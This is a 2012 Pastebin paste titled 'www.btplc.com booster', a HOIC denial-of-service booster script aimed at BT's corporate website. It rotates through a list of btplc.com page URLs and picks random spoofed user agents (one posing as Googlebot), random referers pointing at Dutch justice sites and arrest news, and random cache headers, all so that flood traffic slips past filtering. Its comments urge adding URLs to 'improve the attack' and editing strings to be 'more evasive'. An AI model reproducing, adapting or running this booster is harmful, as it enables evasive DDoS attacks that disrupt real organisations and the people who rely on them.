Advertisement
anonyops_europe

www.btplc.com booster

Jul 29th, 2012
1,731
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.05 KB | None | 0 0
  1. Dim useragents() as String
  2. Dim referers() as String
  3. dim randheaders() as string
  4. Dim randURLs() as string
  5.  
  6. // populate rotating urls
  7. // IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
  8. randURLs.Append "http://www.btplc.com/thegroup/index.cfm"
  9. randURLs.Append "http://www.btplc.com/news/index.cfm"
  10. randURLs.Append "http://www.btplc.com/responsiblebusiness/index.htm"
  11. randURLs.Append "http://www.btplc.com/innovation/index.cfm"
  12. randURLs.Append "http://www.btplc.com/careercentre/index.cfm"
  13. randURLs.Append "http://www.btplc.com/btlondon2012/index.htm"
  14. randURLs.Append "http://www.btplc.com/Sharesandperformance/Dividends/Dividends.htm"
  15. randURLs.Append "http://www.btplc.com/sharesandperformance/sharepricegraphs/index.cfm"
  16. randURLs.Append "http://www.btplc.com/Sharesandperformance/AGMs/AGM.htm"
  17. randURLs.Append "http://www.btplc.com/Sharesandperformance/Fixedincome/index.htm"
  18. randURLs.Append "http://www.btplc.com/News/Photoandimagelibrary/index.htm"
  19. randURLs.Append "http://www.btplc.com/News/Financialreports/index.htm"
  20. randURLs.Append "http://www.btplc.com/News/Latestvideosandpodcasts/audio.htm"
  21. randURLs.Append "http://www.btplc.com/News/Requestamanagersprofile/index.htm"
  22.  
  23.  
  24. // rotate out url
  25. URL = randURLs(RndNumber(0, randURLs.UBound))
  26.  
  27. // EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!
  28.  
  29. // populate list
  30. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
  31. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
  32. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
  33. useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  34. useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  35. useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
  36. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
  37. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
  38. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
  39. useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
  40. useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
  41. useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
  42. useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
  43. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
  44. useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
  45. useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"
  46.  
  47. // populate referer list
  48. referers.Append "http://www.google.com/?q=dutch+boy+arrested"
  49. referers.Append "http://www.google.com/?q=dutch+anonymous+hacker"
  50. referers.Append "http://www.google.com/?q=anonymous+hacker"
  51. referers.Append URL
  52. referers.Append "http://www.om.nl/actueel/"
  53. referers.Append "http://www.om.nl/actueel/omtv_0/2010/video_om_congres/"
  54. referers.Append "http://www.om.nl/vast_menu_blok/service/"
  55. referers.Append "http://www.meldmisdaadanoniem.nl/"
  56. referers.Append "http://www.justitie.nl/"
  57. referers.Append "http://www.om.nl/actueel/omtv_0/2010/video_om_congres/"
  58. referers.Append "http://www.om.nl/organisatie/"
  59. referers.Append "http://www.om.nl/vast_menu_blok/contact/"
  60. referers.Append "http://www.om.nl/algemene_onderdelen/sitemap/"
  61. referers.Append "http://www.theregister.co.uk/2010/12/09/wikileaks_ddos_arrest/"
  62.  
  63. // Add random headers
  64. randheaders.Append "Cache-Control: no-cache"
  65. randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
  66. randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
  67. randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
  68. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  69. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
  70. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
  71. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
  72. randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
  73. randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
  74. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  75. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  76. randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
  77. randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
  78. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
  79. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
  80. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  81. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
  82. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
  83. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"
  84.  
  85. Headers.Append "Keep-Alive: 115"
  86. Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
  87. Headers.Append "Connection: keep-alive"
  88.  
  89. // ------------------ DO NOT EDIT BELOW THIS LINE
  90.  
  91. // generate random referer
  92. Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
  93. // generate random user agent (DO NOT MODIFY THIS LINE)
  94. Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
  95. // Generate random headers
  96. Headers.Append randheaders(RndNumber(0, randheaders.UBound))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement